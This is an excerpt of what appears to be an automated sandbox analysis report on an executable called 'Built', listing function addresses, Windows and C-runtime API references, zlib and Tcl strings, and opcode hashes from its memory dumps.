Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: 9f4e4e738d44f46ad2e55ab6ebf46b83c2bc2b25c6657284d3a78060318321bb
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: EFE17768D3DB03D1EA59FB14A9501B4A3A5AF8C792FD4103ACC1D06BA6FF7CB5488670

Function 00007FF76D5E33BC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF76D5E340A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E3A76
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E3BEC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E3EAA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E40CA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E4307
memcpy_s.LIBCPMT ref: 00007FF76D5E43E2
memcpy_s.LIBCPMT ref: 00007FF76D5E448D
memcpy_s.LIBCPMT ref: 00007FF76D5E455C

Strings

1#INF, xrefs: 00007FF76D5E3533
1#SNAN, xrefs: 00007FF76D5E351A
1#QNAN, xrefs: 00007FF76D5E3523
1#IND, xrefs: 00007FF76D5E34F7

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction ID: 79f1460d613a656cbce3d52f96edd7243015ddad6a39da682bad04bbfb688e09
Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction Fuzzy Hash: 48B2D272A2C292CAF724AF65D4407F9B7A1FB58389F805135DE0D57E96EB38E900CB50

Function 00007FF76D5C9FCD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 00007FF76D5CA990
invalid code lengths set, xrefs: 00007FF76D5CA14D
too many length or distance symbols, xrefs: 00007FF76D5CA166
invalid distances set, xrefs: 00007FF76D5CA4C0
invalid literal/lengths set, xrefs: 00007FF76D5CA453
invalid bit length repeat, xrefs: 00007FF76D5CA3B9
invalid literal/length code, xrefs: 00007FF76D5CA702
invalid code -- missing end-of-block, xrefs: 00007FF76D5CA3E6
invalid distance code, xrefs: 00007FF76D5CA8D4

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction ID: 1d2301548f859a243391e01f5c30640a15d940abfa5e1034b00205bd8af7627a
Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction Fuzzy Hash: DE52F672A286A58BE7549F14C458B7D7BE9FB84344F81413DEA4A87B81EB3CD940CF60

Function 00007FF76D5CC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF76D5CC468
RtlCaptureContext.KERNEL32 ref: 00007FF76D5CC495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF76D5CC4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF76D5CC4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF76D5CC544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5CC561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5CC56C

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 8d9d8a933923093185c47f1eb5d5062bc5fa43f7293ddd6cb9ae882ba88b93ca
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: EF312172618B81C5EB60AF60E8807FD7364FB48745F444039DA4D47B95EF38D548CB20

Function 00007FF76D5C29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF76D5C342E,?,00007FF76D5C3534), ref: 00007FF76D5C2A14
FormatMessageW.KERNEL32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2A7D
MessageBoxW.USER32 ref: 00007FF76D5C2ACF

Strings

%ls%ls: %ls, xrefs: 00007FF76D5C2A96
Error, xrefs: 00007FF76D5C2ABE
<FormatMessageW failed.>, xrefs: 00007FF76D5C2A83

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction ID: dc1cf27e58306d8152ba49d9e342c357a3e727a90219720369369e1d754be31e
Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction Fuzzy Hash: 5321FF7262CB86C2E720BB10F4516DAB365FB88785F800136EE8D53E99EF7CD5468B50

Function 00007FF76D5E4F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF76D5E4F55

Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC

Part of subcall function 00007FF76D5D9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

Part of subcall function 00007FF76D5D9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C19
Part of subcall function 00007FF76D5D9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C3E

_get_daylight.LIBCMT ref: 00007FF76D5E4F44

Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C

_get_daylight.LIBCMT ref: 00007FF76D5E51BA
_get_daylight.LIBCMT ref: 00007FF76D5E51CB
_get_daylight.LIBCMT ref: 00007FF76D5E51DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
String ID:
API String ID: 1458651798-0
Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction ID: de8003d49b5fee1363dccf334329b06382036a61e58d742a96b94429c9cbb468
Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction Fuzzy Hash: 9AD18C26E2C252C6E724BF26D8511B9A7A1EF88B84FC44135EE4D47A96FF3CE441C760

Function 00007FF76D5D9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF76D5D999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF76D5D99B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF76D5D99F0
IsDebuggerPresent.KERNEL32 ref: 00007FF76D5D9A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5D9A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5D9A3E

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: ac4028a1de4663d90789a5a4f941f7ecf2165661c67e79deb3bba9e96551ecee
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: A9314F32628B81C5DB60EF25E8502AEB3A4FB88755F940139EE9D47B56EF38D145CB20

Function 00007FF76D5E0B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E0BD0
FindFirstFileExW.KERNEL32 ref: 00007FF76D5E0CDA

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction ID: dd639588ca415a33586a40ada6433f0ff477c77c3d87df152ecc0dfd81fe59c7
Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction Fuzzy Hash: D1B1B422B2C692C1EA60BB2A95101B9E391EB58BE4FC45132ED5D47FD6EF3CE441C720

Function 00007FF76D5E518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF76D5E51BA

Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C

_get_daylight.LIBCMT ref: 00007FF76D5E51CB

Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC

_get_daylight.LIBCMT ref: 00007FF76D5E51DC

Part of subcall function 00007FF76D5E48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48EC

Part of subcall function 00007FF76D5D9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
String ID:
API String ID: 2248164782-0
Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction ID: aa6c6b4cae37d3970b30fe50c24a69c96ebd3c86faf7b45a272d96d7fc422627
Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction Fuzzy Hash: 67514B32E2C642C6E724FF21E9915B9A761AB4C784FC44539EE4D47A97EF3CE4408B60

Function 00007FF76D5CC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF76D5CC35C
GetCurrentThreadId.KERNEL32 ref: 00007FF76D5CC36A
GetCurrentProcessId.KERNEL32 ref: 00007FF76D5CC376
QueryPerformanceCounter.KERNEL32 ref: 00007FF76D5CC386

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: f0afdc3d5d5b05beda3da0936d3a40748ff4e0c8b6a0eda82b7508a2a39b0d53
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 7D114F22B28B05C9EB00AB60E8442B973A4FB59759F440E31DE6D86BA5EF78D1548350

Function 00007FF76D5E2F20 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF76D5E2F86
memcpy_s.LIBCPMT ref: 00007FF76D5E2FB1

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction ID: 72b1b63e13c9acf109fc5a2181a5db1a71b7aad057881c3a8c3bb5912b73ae41
Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction Fuzzy Hash: 23C1C372B2C286C7E724AF19A044A6AF791F788785F848135DF4A47B65EE3DE801CB00

Function 00007FF76D5C979B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

, xrefs: 00007FF76D5C987B
header crc mismatch, xrefs: 00007FF76D5C9C41
unknown header flags set, xrefs: 00007FF76D5C97E5

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction ID: dbc86893894f832867a786ffeab7525c8898b8f349c3b28d1f02af28eddd2567
Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction Fuzzy Hash: 95F1B372A2C3C5CBE7A5AB05C088A3ABAA9FF44749F45513CDE4907B92DB38D540CF60

Function 00007FF76D5E8A38 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF76D5E8C87
RaiseException.KERNEL32 ref: 00007FF76D5E8C98

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction ID: 649eb230ceb17d1999d7a057f0f5860260487cc9000d3d68a89ca7e9da382c17
Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction Fuzzy Hash: 96B18B73618B88CBE715EF29C8463687BA0F788B48F188932DE5D83BA5DB39D451C711

Function 00007FF76D5D2CC4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF76D5D3074
, xrefs: 00007FF76D5D2E32

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction ID: 979b88c925cb8a9363d76692c291f42dfbb81031ba2ab6d5bd0eebf7f50b8a81
Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction Fuzzy Hash: CDE1C732A2D642C6EB78AE15C160139B360FF45B48F944135DE6E07B96EF39D842C778

Function 00007FF76D5C95FB Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF76D5C9782
invalid window size, xrefs: 00007FF76D5C9769

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction ID: 852ef9ea1e9655366a6077c4ab5073d47ef758f14f7623db43a1023c49575360
Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction Fuzzy Hash: 31918372A2C2C6C7E7A49B14C488B7E7AA9FB44345F51413DEE4A47AC1EB38E540CF61

Function 00007FF76D5DD200 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF76D5DD38A
e+000, xrefs: 00007FF76D5DD30D

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
